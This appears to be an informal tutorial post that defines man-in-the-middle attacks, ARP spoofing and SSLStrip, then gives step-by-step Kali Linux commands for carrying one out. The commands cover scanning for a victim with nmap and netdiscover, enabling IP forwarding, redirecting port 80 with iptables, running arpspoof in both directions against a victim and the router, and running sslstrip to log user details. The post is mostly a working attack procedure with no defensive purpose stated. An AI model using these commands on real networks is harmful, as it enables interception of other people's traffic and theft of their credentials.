What is a MitM Attack?
http://www.veracode.com/security/man-middle-attackA man-in-the-middle attack is a type of cyberattack where a malicious actor inserts him/herself into a conversation between two parties, impersonates both parties and gains access to information that the two parties were trying to send to each other. A man-in-the-middle attack allows a malicious actor to intercept, send and receive data meant for someone else, or not meant to be sent at all, without either outside party knowing until it is too late. Man-in-the-middle attacks can be abbreviated in many ways, including MITM, MitM, MiM or MIM.
What is Arpspoof?
http://www.veracode.com/security/arp-spoofingARP spoofing is a type of attack in which a malicious actor sends falsified ARP (Address Resolution Protocol) messages over a local area network. This results in the linking of an attacker’s MAC address with the IP address of a legitimate computer or server on the network. Once the attacker’s MAC address is connected to an authentic IP address, the attacker will begin receiving any data that is intended for that IP address. ARP spoofing can enable malicious parties to intercept, modify or even stop data in-transit. ARP spoofing attacks can only occur on local area networks that utilize the Address Resolution Protocol.
What is SSLStrip?
http://www.thoughtcrime.org/software/sslstrip/This tool provides a demonstration of the HTTPS stripping attacks that I presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. For more information on the attack, see the video from the presentation below.
Lab and Req:
Kali Linux (any architecture)
Be on the same network as the victim
> Gather some basic information
Firstly, we'll need to know our targets IP and the router's IP. So to firstly get the gateway's IP, type:
route -nUnder where it says gateway, your gateway IP should say, like this:
Mine is 192.168.1.1. Now let's find our victims IP by typing (this will also scan for their OS):
nmap -O <gateway IP>/24Whenever the scan finishes, it will seem like a bunch of mess at first. But just look below where it says, "Report for <IP>", and select your target. You can also just arpspoof the entire network. But this may cause the network to shutdown if there are too many active users.
You can also use netdiscover:
netdiscover -i <interface, usually eth0> -r <gateway IP>> Now you got your targets and router information, we can begin arpspoof, but before we need to quickly port forward and configure IP tables
Firstly, let's port forward so we don't initiate a DoS attack:
echo 1 > /proc/sys/net/ipv4/ip_forwardTo see if it worked, see if the value in the file is '1'.
Now to set up iptables:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080> Arpspoof
If you're hard wired, like me, you'll use your ethernet interface, which for me is eth0. You can check this by:
ifconfigIf you have a wireless network adapter, it will be wlan0, or wlan1, etc.
When you've figured out what to use, we'll begin arpspoof. I'll be arpspoofing the entire network, but you'll most likely just be arpspoofing one target. To do the arpspoof, do the following:
arpspoof -i(nterface) <interface> -t(arget) <router> <victim IP>You'll need to reverse the situation by typing:
arpspoof -i(interface) <interface> -t(arget) <victim IP> <router>The output should be for both terminals:
> Begin SSLStripping and other tools
To begin sslstripping and logging user details, type:
sslstrip -k -l 8080 -w /root/Desktop/log.logWe'll also want to tail it so we don't have to manually check the output everytime:
tail -F /root/Desktop/log.logNow whenever your victim visits a HTTPS site that doesn't use TLS or HSTS, the encryption mechanism will be decrypted from HTTPS to HTTP so all incoming information is decrypted.
To do other tools, like urlsnarf, etc. Google it! This wasn't a research paper, just something I put together quickly.
